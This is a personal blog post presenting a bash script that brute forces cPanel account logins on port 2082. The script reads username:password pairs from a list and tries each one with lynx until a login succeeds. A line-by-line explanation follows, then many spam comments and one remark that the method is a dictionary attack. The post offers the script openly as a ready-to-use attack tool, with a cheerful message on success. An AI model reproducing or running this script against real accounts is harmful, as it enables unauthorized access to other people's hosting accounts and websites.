jump to navigation

BruteForce tool using linux shell script June 17, 2011

Posted by hasnain110 in Uncategorized.
trackback

Hello, did you ever try to brute force a website login page and you didn’t find the right tool?
it always happen, so i will explain how i did it with linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | ‘__| | | |/ _ \/ _` | __| ‘_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo “.::Cpanel BruteForcer By Dr.Death::.”
echo
echo -n “Enter domain name for the Cpanel account you want bruteforce:
> ”
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

lets explain what we did:

#!/usr/bin/env bash
to execute the script using bash shell from the environment "env".

read site
set the user input as variable "$site" which will be the website domain name.

n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.

for (( i=1; i <= $n; i++));
we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.

password=`sed -n "$i"p pass_list`
here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082&quot;

so password file pass_list should include the usernames and passwords in this format: "username:password"

if [ ! -z "$b" ]; then
here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.

Note: You will need your own password dictionary file to make it work

Advertisements

Comments»

1. How to hack a wifi password - March 3, 2013

Hi there I am so excited I found your blog, I really found you by error, while I was looking on Yahoo for something else, Regardless
I am here now and would just like to say many thanks for a tremendous
post and a all round enjoyable blog (I also love the theme/design),
I don’t have time to read it all at the moment but I have bookmarked
it and also included your RSS feeds, so when
I have time I will be back to read a lot more,
Please do keep up the awesome jo.

2. hasnain110 - March 4, 2013

Thanks for liking my blog..appreciate it !

3. http://bounchi.free.fr/phpinfo.php?A[]=Honau+Kai+Resort+&+Spa+Discount+Code+(a+href=http://www.cisnc.org/index.php/member/1509http://www.cisnc.org/index.php/member/1509/a) - June 27, 2013

For first-class snorkel sailing, the Ali’i Nui 65-foot catamaran is a diver’s dream.
The internet is the best place to start, and if youre reading this, youre on the right track.

50% Off Rates at Sheraton Kauai Resort (located in Poipu) The Sheraton Kauai
Resort is offering a special rate of $285, with a fifth night free when booking five nights or more, along with a
special $50 daily food and activity credit, and two for one surf lessons in Hanalei Bay.

4. your ad here - August 1, 2013

Hi there just wanted to give you a quick heads up.
The words in your article seem to be running off the screen in Ie.
I’m not sure if this is a formatting issue or something to do with web browser compatibility but I figured I’d
post to let you know. The design and style look great though!

Hope you get the problem fixed soon. Thanks

5. http://www.webiihost.com/ - September 7, 2013

I just like the helpful information you provide on your articles.
I will bookmark your weblog and test again here regularly.
I’m relatively sure I will be told lots of new stuff
right here! Best of luck for the following!

6. fun stuff to make out of duct tape - December 22, 2013

Admiring the commitment you put into your blog and detailed information
you offer. It’s nice to come across a blog every once in
a while that isn’t the same old rehashed information.
Wonderful read! I’ve saved your site and I’m including your RSS
feeds to my Google account.

hasnain110 - December 23, 2013

Thanks Appreciate it

7. Fred - January 10, 2014

Does your website have a contact page? I’m having trouble locating it but,
I’d like to send you an e-mail. I’ve got some creative ideas for your blog you might be interested in hearing.

Either way, great website and I look forward to
seeing it expand over time.

8. Appleton City Wisconsin Divorce Papers - January 12, 2014

These are really wonderful ideas in on the topic of blogging.

You have touched some fastidious things here.
Any way keep up wrinting.

9. พนันบอล - January 21, 2014

I loved as much as you will receive carried out right here.
The sketch is attractive, your authored subject matter stylish.
nonetheless, you command get bought an edginess over that you wish be delivering the
following. unwell unquestionably come further formerly
again as exactly the same nearly very often inside case you shield this hike.

10. fig's - January 23, 2014

phil’s

11. Alysa - February 3, 2014

Stainless Steel 8mm Filigree Center Stripe Men’s Band perfect wedding band for him though that one I prefer to the,
Black Stainless Steel 8mm Cable Center Men’s Band, in the event the ring was a silver
or the cable, with them both black in color it doesnt stand
out considerably

12. http://www.youtube.com/watch?v=hfrcHOIDtOY - February 6, 2014

My coder is trying to convince me to move to .net from PHP.
I have always disliked the idea because of the costs. But he’s tryiong none the less.
I’ve been using WordPress on a variety of websites for about a year and am nervous about
switching to another platform. I have heard good things about blogengine.net.
Is there a way I can import all my wordpress posts into it?
Any kind of help would be greatly appreciated!

13. turbo echange standard - February 9, 2014

This design is wicked! You most certainly know how to keep a reader amused.

Between your wit and your videos, I was almost moved to start
my own blog (well, almost…HaHa!) Fantastic job. I really enjoyed what you had to
say, and more than that, how you presented it.
Too cool!

14. Clochette et la fee pirate telecharger le film - February 27, 2014

Excellent blog you have got here.. It’s difficult to find quality writing like yours these
days. I seriously appreciate people like you! Take care!!

15. Donde Comprar Calzoncillos Calvin Klein - March 1, 2014

This is a topic that’s near to my heart… Many thanks!
Exactly where are your contact details though?

16. Clement - March 1, 2014

It’s actually a cool and helpful piece of info. I am happy that you
shared this helpful information with us. Please stay us informed like this.
Thank you for sharing.

17. http://forum.pride1.de/member.php?action=profile&uid=73089 - March 5, 2014

jedna od top 3 web stranice za apartmanski smještaj koja
sadrži puno odličnih ideja.

18. kuriozitete shqip - March 5, 2014

Its like you read my mind! You sem to know so much about
this, like you wrote the book in it or something.
I think that yyou could ddo with some pics to drive the message home a little bit, but instead of that, this is fantastic blog.
A fantastic read. I will definitely be back.

19. semillas autoflorecientes - March 8, 2014

Hola ! Conozco es clase de off-topic , pero que
necesitaba preguntar. ¿Tiene ejecutando una
gestionar bien establecida blogs como requerirá un montón de gran cantidad de trabajo?
Soy nuevo a operar un blog pero no obstante Yo escribo en mi diario todos los días
. Me gustaría iniciar un blog , así que puedo podré
mi cuenta sentimientos línea. Por favor, hágamelo saber
si usted tiene cualquier tipo de sugerencias recomendaciones o
consejos para nueva aspirantes a bloggers . Agradezco !

20. اثاث مستعمل - March 10, 2014

Very good article. I will be going through some
of these issues as well..

21. Anonymous - March 21, 2014

Hi, I do believe this is an excellent web site.
I stumbledupon it 😉 I’m going to come back once again since I book-marked
it. Money and freedom is the greatest way to change, may you be rich and continue
to help others.

22. presto electric skillet - March 24, 2014

Remember that a fully seasoned cast iron skillet needs
time and use to become truly non-stick. The following review articles cover items
you may want to avoid spending your hard earned money on.
Beat with electric mixer ,whisk, or wooden spoon until light and fluffy,
adding more warm milk until desired creaminess.

23. Referral Link - March 24, 2014

Fantastic beat ! I would like to apprentice whilst
you amend your website, how can i subscribe for a weblog website?

The account aided me a applicable deal. I had been a little
bit acquainted of this your broadcast offered brilliant transparent idea

24. Dick - April 15, 2014

Is information currently available electronically
in the system being reproduced by hand on paperwork. I could drive mine at top speed, run technically near-perfect laps and still never close on
my opponents. SLP’s High-Output Stage 3 TVS 2300 Supercharger Package (part number: 90410C) (black finish) for
the all-new 2010-11 V8 Camaro is the same technology offered in the new ZR-1 Corvette.

25. سكربت واتس اب - May 6, 2014

http://www.contactarab.com
http:/www.contactarab.com/services/marketing/whatsapp-marketing
اعلانات واتس اب,رسائل جماعية واتس اب,ارسال
واتس اب,سكربت واتس اب,قنوات واتس اب,ارقام
واتس اب,داتا واتس اب,حملات اعلانية واتس اب,whatsapp ads,whatsapp
bulk,send whatsapp ,whatsapp chanels,whatsapp data,whatsapp numbers

26. Truco Para Ganar en La Ruleta Tips... - May 10, 2014

I don’t even know how I ended up here, but I thought this post was good.
I don’t know who you are but definitely you’re going to a famous
blogger if you are not already 😉 Cheers!

27. asuransi bumiputera kesehatan - May 15, 2014

asuransi bumiputera kesehatan

BruteForce tool using linux shell script | Hasnain Ali Blog

28. Fifa 14 Gratuit pc - May 23, 2014

Howdy! This post could not be written any better!
Reading through this post reminds me of my old room mate!
He always kept chatting about this. I will forward this write-up to him.
Pretty sure he will have a good read. Thanks for sharing!

29. lottery strategies pick 6 - June 21, 2014

Normaoly I do not learn post on blogs, but I wish to say that this write-up very forced me to take a look att and
do so! Your writing taste has beesn amazed me. Thanks, very great post.

30. asuransi jiwa prudential - July 28, 2014

asuransi jiwa prudential

BruteForce tool using linux shell script | Hasnain Ali Blog

31. Terese - August 8, 2014

I have learn some good stuff here. Definitely price bookmarking for revisiting.

I surprise how so much attempt you set to create this sort of excellent informative website.

32. drole video - August 12, 2014

Vidéo ajoutée le 11 octobre 2013 dans la catégorie Animaux drôles avec les
mots clés d’oiseaux , drôles , Jour , vacances , Vidéos , YISISTER Depuis
la diffusion d’une partie de l’interview de Patrice EVRA sur Téléfoot, on n’entend parler
que de ça, peut-être plus que l’équipe de France
de football va affronter l’UKRAINE au barrage. Faut-rire est fait pour
vous si vous aimez les blog humour ou blog marrant. Pour vous
détendre, retrouvez le meilleur du divertissement dans un esprit bon enfant.
Perez Hilton est tout excité ! Hier après-midi,
il a découvert le message que Julien Doré lui avait posté sur Youtube

33. http://www.incaradvancements.co.uk - August 15, 2014

It’s wonderful that you are getting ideas from this article as well as from our argument made at this time.

34. Cristina - August 25, 2014

For one thing, it is a time to share your views and feelings.
He also lectures frequently on a national basis, including speeches before the American Law Institute –
American Bar Association (ALI-ABA), the International Forum, the Association for Advanced Life Underwriting (AALU),
the Million Dollar Round Table (MDRT), and numerous life insurance companies,
brokerage firms and trade associations. Would you like your family to spend more time together
as a family.

35. home improvement plan - August 31, 2014

home improvement plan

BruteForce tool using linux shell script | Hasnain Ali Blog

36. Hennepin county district court family law - August 31, 2014

This paragraph is genuinely a good one it assists new net
users, who are wishing in favor off blogging.

37. best Minneapolis divorce Attorney - September 1, 2014

Valuable information. Fortunate me I discovered your web site unintentionally,
and I’m shocked why tis accident didn’t came about earlier!
I bookmarked it.

38. video drole de chute - September 1, 2014

Derrière unique ton clairement pendant propre décalage en compagnie de icelui de la série (de concert, ces deux créatif
sourient eux contrairement aux personnages de Termes
conseillés of Thrones ), la vidéo de HBO nous distille
quelques informations intéressantes. C’est or dont’nous-mêmes apprend dont lorsque d’bizarre moment,
c’est une centaine de lieus de tournage à travers sept endroit qui sont visités pendant les équipes.
Enjambée moins de 3000 costumes sont nécessaires, 4000 praticable, 257 joyeux, 703
membres de l’équipe selon programme ensuite 8 bouteilles
de sauce piquante.

39. tacoma child custody lawyer - September 2, 2014

tacoma child custody lawyer

BruteForce tool using linux shell script | Hasnain Ali Blog

40. Glock Slide plate removal - September 6, 2014

Its like you learn my thoughts! Youu seem to know a lot about this, like yyou wrote the e-book in it or something.

I beloieve that you just can do with soome percrnt to drive the message
house a bit, but other than that, that is great blog.
A great read. I wilol certainly be back.

41. glock slide plate cover gen 4 - September 6, 2014

My family every time say that I am wasting my time herre at net,
except I know I am getting know-how dsily by reading thes pleasant content.

42. Kellee - September 11, 2014

Yesterday, while I was at work, my sister stole my iphone and
tested to see if it can survive a twenty five foot drop, just so she can be a youtube
sensation. My iPad is now destroyed and she has 83 views.
I know this is entirely off topic but I had to share it with someone!

43. Criminal Law - September 23, 2014

Criminal Law

BruteForce tool using linux shell script | Hasnain Ali Blog

44. Coenster - July 26, 2015

Not True!! using a dictionary file is NOT bruteForce it is Dictionary Atacking. Bruteforce is the ability to use any possible character [A-Z, a-z, 0-9, !@#$%^&*_-|\/?><] in any order and any length. Bruteforce does not rely on passwd files, most passwds that I crack(i do penetration testing) is not found in dictionary files. unless maybe you have a 50GB dictionary file. I have some pretty big ones.

But nice code non the less.
Maybe change the name to "Dictionary Attacking" to avoid confusion.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: